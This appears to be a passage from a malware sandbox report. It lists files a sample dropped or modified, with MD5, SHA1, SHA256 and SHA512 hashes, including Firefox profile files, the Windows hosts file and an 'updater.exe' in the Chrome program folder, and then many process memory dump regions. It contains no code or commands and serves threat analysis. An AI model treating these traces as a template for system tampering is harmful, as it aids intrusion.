324ef21f793f2611c30df5e3161325e94f88df44934618ff2ff0f2e9f1b9f008c27437c4d7e7a04ae20e66668f095a2e93a18b703b121d0f7512ef8bc15dcd8f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\prefs.js
Filesize
6KB

MD5
fcd5f37e5e4066f7cffe8eb106b6ce19

SHA1
b0a1c4d3d5c96271429fb09cb71055d177c13402

SHA256
38dbdb91f24f8e138803d71d0f7e4758fbb78e7f657208325fe30a501e225c67

SHA512
afdf7697bc784c3c85f30a8a1e4caa32459cf7f19c1ffacde04f62f089218ff1899ffe69fc465677d719546c8f91bea0d04807b13d58096f79aeba8eef0a0a15

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\sessionCheckpoints.json.tmp
Filesize
259B

MD5
700fe59d2eb10b8cd28525fcc46bc0cc

SHA1
339badf0e1eba5332bff317d7cf8a41d5860390d

SHA256
4f5d849bdf4a5eeeb5da8836589e064e31c8e94129d4e55b1c69a6f98fb9f9ea

SHA512
3fa1b3fd4277d5900140e013b1035cb4c72065afcc6b6a8595b43101cfe7d09e75554a877e4a01bb80b0d7a58cdcfe553c4a9ef308c5695c5e77cb0ea99bada4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\sessionstore.jsonlz4
Filesize
928B

MD5
93fcd5ec52d4b1a32c765e7669f8c25c

SHA1
79a830058406409861264fb0cf925eee64db2350

SHA256
a6be7ffa8cfd9b319d72ddddfb2bd1067c83cbc2be93007e075e1e8df8695bb4

SHA512
5df0a146d9ed52617cbf6053f36fd8cae702976748a89453c77f74892998e33d88cd517295f04651aca5a24833fb07e7ef4f2fa056817b21b0172133e9a42dea

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
\??\c:\program files\google\chrome\updater.exe
Filesize
2.1MB

MD5
a12bc9557ad889a49e7b4f970c78dda8

SHA1
5383b8e6d09d41384281b95f9ccc8e050e7c04fa

SHA256
9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

SHA512
be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

Download Submit
memory/224-141-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-142-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-143-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-140-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-133-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-139-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-144-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-145-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-135-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/224-134-0x000001D982DE0000-0x000001D982DE1000-memory.dmp

Filesize
4KB

Download
memory/656-317-0x00007FF789990000-0x00007FF789BA6000-memory.dmp

Filesize
2.1MB

Download
memory/656-279-0x00007FF789990000-0x00007FF789BA6000-memory.dmp

Filesize
2.1MB

Download
memory/1876-294-0x0000029D0BE00000-0x0000029D0C8C1000-memory.dmp

Filesize
10.8MB

Download
memory/1876-290-0x0000029D0A530000-0x0000029D0A540000-memory.dmp

Filesize
64KB

Download
memory/1876-291-0x0000029D0A530000-0x0000029D0A540000-memory.dmp

Filesize
64KB

Download
memory/1876-292-0x0000029D0A530000-0x0000029D0A540000-memory.dmp

Filesize
64KB

Download
memory/2128-177-0x00007FF7E2850000-0x00007FF7E2A66000-memory.dmp

Filesize
2.1MB

Download
memory/2128-146-0x00007FF7E2850000-0x00007FF7E2A66000-memory.dmp

Filesize
2.1MB

Download
memory/3196-195-0x00000266399B0000-0x00000266399C0000-memory.dmp

Filesize
64KB

Download
memory/3196-218-0x000002663A7C0000-0x000002663A7DC000-memory.dmp

Filesize
112KB

Download
memory/3196-222-0x000002663A7E0000-0x000002663A7E6000-memory.dmp

Filesize
24KB

Download
memory/3196-221-0x000002663A7B0000-0x000002663A7B8000-memory.dmp

Filesize
32KB

Download
memory/3196-220-0x000002663A800000-0x000002663A81A000-memory.dmp

Filesize
104KB

Download
memory/3196-214-0x000002663A370000-0x000002663A38C000-memory.dmp

Filesize
112KB

Download
memory/3196-216-0x00000266399B0000-0x00000266399C0000-memory.dmp

Filesize
64KB

Download
memory/3196-215-0x00000266399B0000-0x00000266399C0000-memory.dmp

Filesize
64KB

Download
memory/3196-223-0x000002663A7F0000-0x000002663A7FA000-memory.dmp

Filesize
40KB

Download
memory/3196-217-0x000002663A390000-0x000002663A39A000-memory.dmp

Filesize
40KB

Download
memory/3196-219-0x000002663A7A0000-0x000002663A7AA000-memory.dmp

Filesize
40KB

Download
memory/3244-190-0x000002B63DBB0000-0x000002B63DBC0000-memory.dmp

Filesize
64KB

Download
memory/3244-189-0x000002B63DBB0000-0x000002B63DBC0000-memory.dmp

Filesize
64KB

Download
memory/3244-188-0x000002B63DBB0000-0x000002B63DBC0000-memory.dmp

Filesize
64KB

Download
memory/3460-274-0x00007FF640350000-0x00007FF640366000-memory.dmp

Filesize
88KB

Download
memory/3460-265-0x00007FF640350000-0x00007FF640366000-memory.dmp

Filesize
88KB

Download
memory/3696-268-0x00000210F1290000-0x00000210F12B0000-memory.dmp

Filesize
128KB

Download
memory/3696-642-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-272-0x00000210F12B0000-0x00000210F12D0000-memory.dmp

Filesize
128KB

Download
memory/3696-273-0x00000210F1290000-0x00000210F12B0000-memory.dmp

Filesize
128KB

Download
memory/3696-648-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-275-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-267-0x00000210F12B0000-0x00000210F12D0000-memory.dmp

Filesize
128KB

Download
memory/3696-278-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-266-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-264-0x00000210F0E30000-0x00000210F0E70000-memory.dmp

Filesize
256KB

Download
memory/3696-263-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-262-0x00000210F0A90000-0x00000210F0AB0000-memory.dmp

Filesize
128KB

Download
memory/3696-270-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-646-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-644-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-405-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-640-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-638-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-636-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-311-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-634-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-632-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-566-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-630-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-319-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-321-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-323-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-325-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3696-628-0x00007FF6ABB90000-0x00007FF6AC384000-memory.dmp

Filesize
8.0MB

Download
memory/3768-229-0x00007FF789990000-0x00007FF789BA6000-memory.dmp

Filesize
2.1MB

Download
memory/3768-194-0x00007FF789990000-0x00007FF789BA6000-memory.dmp

Filesize
2.1MB

Download
memory/3768-261-0x00007FF789990000-0x00007FF789BA6000-memory.dmp

Filesize
2.1MB

Download
memory/4028-161-0x000002834F0B0000-0x000002834F0C0000-memory.dmp

Filesize
64KB

Download
memory/4028-172-0x000002834F0B0000-0x000002834F0C0000-memory.dmp

Filesize
64KB

Download
memory/4028-173-0x000002834F0B0000-0x000002834F0C0000-memory.dmp

Filesize
64KB

Download
memory/4028-174-0x000002834F0B0000-0x000002834F0C0000-memory.dmp

Filesize
64KB

Download
memory/4048-152-0x0000024BFD550000-0x0000024BFD572000-memory.dmp

Filesize
136KB

Download
memory/4420-314-0x0000018556C70000-0x0000018557731000-memory.dmp

Filesize
10.8MB

Download
memory/4420-312-0x000001856FE00000-0x000001856FE10000-memory.dmp

Filesize
64KB

Download
memory/4420-307-0x000001856FE00000-0x000001856FE10000-memory.dmp

Filesize
64KB

Download
memory/4420-309-0x000001856FE00000-0x000001856FE10000-memory.dmp

Filesize
64KB

Download
memory/4420-308-0x000001856FE00000-0x000001856FE10000-memory.dmp

Filesize
64KB

Download
memory/4476-251-0x000001883B240000-0x000001883B250000-memory.dmp

Filesize
64KB

Download
memory/4476-240-0x000001883B240000-0x000001883B250000-memory.dmp

Filesize
64KB

Download
memory/4476-252-0x00007FF3FF210000-0x00007FF3FF220000-memory.dmp

Filesize
64KB

Download
memory/4476-253-0x000001883B240000-0x000001883B250000-memory.dmp

Filesize
64KB

Download
memory/4476-255-0x000001883B249000-0x000001883B24F000-memory.dmp

Filesize
24KB

Download
memory/4476-235-0x000001883B240000-0x000001883B250000-memory.dmp

Filesize
64KB

Download